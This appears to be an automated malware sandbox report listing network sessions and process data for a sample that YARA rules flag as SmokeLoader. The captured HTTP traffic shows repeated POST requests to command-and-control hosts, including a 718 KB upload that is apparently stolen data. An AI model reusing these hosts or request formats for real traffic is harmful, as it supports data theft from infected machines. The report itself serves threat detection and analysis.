                                                                    Oct 3, 2023 09:55:49.483118057 CEST7436INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=1kkrf66sldibeo0dl441044uvc; expires=Sat, 27 Jan 2024 01:42:28 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:49 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xpUO8Ovf%2BzLE4cycG1z%2FcDi%2BaOw5hsB7JHcSEw2o4v7nuqu9mC9zQtmPTj0dAeIH0h%2FNkAmveqTBtzKcwjyNGQ9Kn6RYJU7%2BFnkoo0EyUpGoDGfaY8A%2FW6eOTjHFkfdwDu6UCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8103a0001e31392b-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:49.483172894 CEST7436INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    82192.168.2.349920172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:49.793399096 CEST7437OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:49.794106960 CEST7438OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:50.034212112 CEST7439INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=8m6kvg1aeuit04k4824viocpfc; expires=Sat, 27 Jan 2024 01:42:28 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:49 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mjLLwaCdvcvZy%2BN%2FVxDoplBYiBPPci5hJJp3aN3HD0isiGDTwhmz0%2FYuY%2BQs711H3BGM8evX3OemOYlPYA%2Fi02WdsbuVV0Hfv6OZADEE3dDSbrSlbhGxL4aigNtaLVxPOEYVmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8103a0046ecb0816-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:50.034255981 CEST7439INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    83192.168.2.349921104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:50.248358965 CEST7440OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:50.249082088 CEST7440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:50.571069002 CEST7441INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=mntd5aq8f5i233qo3egtdp7rje; expires=Sat, 27 Jan 2024 01:42:29 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:50 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=If6kM7dRVPvhnVkQQ6TsV%2FhAWfQgu7tPu6XiitRQramkNEzN76fw2s%2FZeMk7aml0fBHK1QvE2A4V3%2BQxvXIMsfcd2NN%2BtqPCgnwOhnfQSZBgf4UU0xrBg6m14GeDEyLUppZjpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8103a0074c0e9c8e-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:50.571132898 CEST7442INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    84192.168.2.349922104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:50.808034897 CEST7442OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:50.808756113 CEST7443OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:51.140175104 CEST7444INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=kk5mkloeegoa5qr5t06684rb6b; expires=Sat, 27 Jan 2024 01:42:30 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:51 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SEi643kpoZ0PvpGu0yaYdTLlDHMKdT%2BFIRHU8mPO8zbl7R%2F9KdPgmUj%2Fts%2F05nFsFzWtUeR71nvLqBzUKB9ioVvSNNzHcaicDtdXwk7n8XIbLv5wFdeAXwFicR6F%2ByYmDXL2iw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8103a00acddc580c-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:51.140239954 CEST7444INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    85192.168.2.349923104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:51.370898962 CEST7445OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:51.371318102 CEST7445OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:51.738919020 CEST7447INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=pdjgv1g1uifsfagkr8g00fhuvq; expires=Sat, 27 Jan 2024 01:42:30 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:51 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gdykXm%2BWuiQJMzUcMMt%2F0juqRBeYrXHKSj8Zo4fyS9w8SxEm6nS6IqCjfJEkmmXdwKocpu5s1LqfptAB2ysHtsZHuOes8o6F3ZrprP3%2B9rzgUhu5SbMcRBGdoRpxTu6qPcacog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8103a00e4e9f1ffd-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:51.738979101 CEST7447INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    86192.168.2.349924104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:51.952478886 CEST7448OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:51.953233957 CEST7448OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:52.320103884 CEST7449INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=tkti8kf218vergucta8l0gq4mv; expires=Sat, 27 Jan 2024 01:42:31 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:52 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QSqRyby51zh3%2FQCbfNIott53UFjpe9AXUFnQHs6Kfu2gYiripgya7Ay40SlEDc5npeipw8%2BrKhimrW9%2Fb53t65ZnDsOWNNdvZue8TVdzOjUrBdQkbWezZw3VDZvfkJ4lgHlduw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8103a011e95d82d8-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:52.320168018 CEST7449INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    87192.168.2.349925104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:52.865957022 CEST7450OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 718262
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:52.866549015 CEST7461OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:52.960727930 CEST7463OUTData Raw: 39 ef 2f ce e3 7c c0 3e 1f 60 fd ad fc 4f ea d0 d8 7f 09 bd 5f c4 fd 50 0f c8 c7 09 b7 45 75 7b e8 e3 6b e9 3b 2d 5f 5f 1f 13 b5 38 b0 6f 9a 8f 19 e3 74 2c b7 0c ae 6f bd 96 f0 9a 2a 73 fd 5b be c0 78 dd c6 fe f9 d1 fd 48 e2 10 70 6e 0f 7e 37 81
                                                                    Data Ascii: 9/|>`O_PEu{k;-__8ot,o*s[xHpn~7&5zIi+1/kY+SQyc;d+o.~G#sBlQ-qXopoes{W+cYV>fMgc"#:"`5wK+.
                                                                    Oct 3, 2023 09:55:52.961158991 CEST7465OUTData Raw: f6 ed 6f 7f bb 7b c2 13 9e 10 ea f7 24 af 47 d9 b1 b0 2c 2b 75 48 5d 57 5f 7d 75 e1 e5 7d 3c 4f d8 d3 0d 01 7b 62 8e 64 c5 ff 53 5e 28 6c c9 d2 d1 a5 59 16 ab ca aa cf 5a be 68 1b 70 9b 95 ff f9 ea c0 6d f5 d5 a5 fa 3d 5d 3e ab 3d aa a1 e4 f5 a7
                                                                    Data Ascii: o{$G,+uH]W_}u}<O{bdS^(lYZhpm=]>=:[ Lcbek,g>?? |6DUxO_[dw/;WpccMEj/;GcD_S5?dOBgcaS+'o{L^Y9
                                                                    Oct 3, 2023 09:55:52.961278915 CEST7468OUTData Raw: ee 79 e7 53 02 c6 77 70 c2 ee fa 6b f8 1d 7c bf f7 fa 1d ee 77 0f 3d e8 f6 0c b8 df a6 80 f9 85 9f d1 f7 8d 9f 7d 20 95 f7 31 a3 b2 34 8e 56 ae 8a 1e bf 5c e2 73 f8 5d 7f 23 c7 63 6d 20 73 3e d5 02 aa fe 4f 7f 2f 8d d6 2d 9f 92 07 44 fd 81 63 ee
                                                                    Data Ascii: ySwpk|w=} 14V\s]#cm s>O/-Dc6NE1e&};L0I["n|Oq|b<@o/"\~c>H%[DXv/Jr<N<o/;'rc,<d:S8o~/CL}mQ'g
                                                                    Oct 3, 2023 09:55:52.961319923 CEST7471OUTData Raw: 1b 7e 67 06 24 7f cc 98 ca f4 ff 53 af ff a9 8c eb 9f ea f1 5e ff 93 39 af 7f 60 77 a8 d9 43 8e c7 0c b0 e7 fa 9f 9a 93 b8 e7 24 ae ff a9 e4 f5 5f f5 0f f7 2d de eb f4 de 88 ed 42 66 c9 cb e8 f6 5c f8 cc f3 1c 32 51 3c 4f f1 1c c5 7b 99 75 fc 70
                                                                    Data Ascii: ~g$S^9`wC$_-Bf\2Q<O{upc?K+_13;^N>PwQG,#JRk|NE[Ue_(~Gc}&0c}`Vv^o&~)>Z>yr~qc,
                                                                    Oct 3, 2023 09:55:52.961344957 CEST7473OUTData Raw: f7 71 9d af cf b1 d0 52 c6 14 f2 87 e3 13 fd 8d fe c1 ca fa c2 67 02 f1 40 cc eb cb 7e 56 d3 a4 61 40 ad 20 33 38 4b 87 a7 f5 1c b1 ee 11 a9 7c 2f cd 2e 3e 61 a7 98 df e9 98 8e 75 26 ec 07 cc 2c 10 f5 26 3c 1e 65 5e 88 9a 94 43 2e ff fb 90 ff 7d
                                                                    Data Ascii: qRg@~Va@ 38K|/.>au&,&<e^C.}/t}lgP8Q}^Pb{ktkI?CF$5[B;YO>}}qm9/9u3vv!)xAYd~aN'?>&:`~
                                                                    Oct 3, 2023 09:55:52.961373091 CEST7476OUTData Raw: fb 7c 7e db 59 79 7c 59 23 a9 df f1 38 a8 e9 34 5d 3f c7 5a b4 ce 15 3d 17 ad 73 5b 79 7b dd d7 3f 2e a7 dc cf ba 47 61 cc 3f 7e 7f a1 65 f9 3e ab f7 44 d6 02 5a 9a 6d df fd 19 ef e1 d6 f2 fc ee 06 9f 0f 79 f2 53 e9 b3 6c 21 70 41 9d be 64 6a 4e
                                                                    Data Ascii: |~Yy|Y#84]?Z=s[y{?.Ga?~e>DZmySl!pAdjN.<CJO?;Tp 1'pjATB]?K~NF||6?M??]NI>o1Bord2?dR
                                                                    Oct 3, 2023 09:55:52.961414099 CEST7479OUTData Raw: c4 d2 98 a7 a9 06 2e 4d db c7 0c 0d d9 18 2f a3 cc 4f ea e4 f5 60 3d cc dc 2c 3d 20 af 83 35 7c ec 53 cc a6 db c6 f9 4f 74 7b b5 7d 9c eb 98 d7 87 b1 0e 2d 4d 17 33 20 3e 4f 2d 56 c6 7d 5e d6 73 59 c7 95 eb c3 e5 f8 dc c3 e9 f8 89 e7 90 d5 76 ae
                                                                    Data Ascii: .M/O`=,= 5|SOt{}-M3 >O-V}^sYv+R{^XO+i?nOky&eV|bVjvfyY([kFaGuO(x;"9WD,/8kb2kL
                                                                    Oct 3, 2023 09:55:52.961457968 CEST7481OUTData Raw: ef 1a 2c fd 5f e6 f5 3f d5 87 eb df e0 94 bc 2c fb 01 f3 fd 58 ed c2 0b ce eb d9 a6 fd a7 c7 53 6d bf c5 63 09 cb 2a 3f 6c c6 ed 2f 6a 4d d7 cf eb c8 b3 ee 03 96 4c c4 56 75 ff ec 13 ac a7 8a 35 bd 7f ab ee ff 26 ce a9 51 b0 de f3 63 2c f8 dd 6b
                                                                    Data Ascii: ,_?,XSmc*?l/jMLVu5&Qc,k'LlWMO$:~d|c!SLdR*WNWWUc#W&U^2Gkskv[;jvTru#VucZnO
                                                                    Oct 3, 2023 09:55:52.961484909 CEST7484OUTData Raw: 76 fe 97 b7 ff 33 68 fe 97 d6 e7 b7 62 b4 b5 fc 6f f0 36 db f8 9f 5e 53 59 e3 93 ca ed 6b 98 ff 59 6d cc cb fe 86 81 ff 15 5d de 2a e3 cb 91 93 c7 ff 37 cb b8 4e 6c 8b 4f 4f 58 e7 fe c9 b3 ff 78 bd a3 e4 ff db 8f fd 53 b4 9e 51 da 3f f9 6d 76 f8
                                                                    Data Ascii: v3hbo6^SYkYm]*7NlOOXxSQ?mvl_Z?o?f~YYt{=^*';{gK|i,DYO?&reZ7?{|PXoG!34ah[
                                                                    Oct 3, 2023 09:55:58.631050110 CEST8264INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=1k27v5feg0vdd41fh1b3q3p663; expires=Sat, 27 Jan 2024 01:42:37 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:58 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NIRFy0TQ2ShipZoliDiYK%2FCiUExi9vPoEpbH2Ly0%2BVduJ%2Bnlb5W0dcWXI7HAIPXa6%2F%2FzE6e5gFgNfQ%2F8A6cbHzFNQgNr9xwiOndiohjUjUPbk%2FGqm8q0DXSthbPCl3zj7mhBgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8103a017ab7f073d-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:58.631076097 CEST8264INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    9192.168.2.349814200.92.136.25480C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:04.333462954 CEST1557OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://ppidsxxc.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 222
                                                                    Host: gudintas.at
                                                                    Oct 3, 2023 09:55:04.333498955 CEST1557OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 48 49 a2 e5
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA -[k,vuHIo5zYr8[!b| bW(|6~J~18UQ//GY6#eE8U5?Whj:bU5
                                                                    Oct 3, 2023 09:55:05.114358902 CEST1564INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:04 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:09:53:54
                                                                    Start date:03/10/2023
                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\file.exe
                                                                    Imagebase:0x400000
                                                                    File size:302'592 bytes
                                                                    MD5 hash:EC1D1CD9D43698631CEB1157E680A00A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.900656340.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.900683183.0000000002361000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.900683183.0000000002361000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
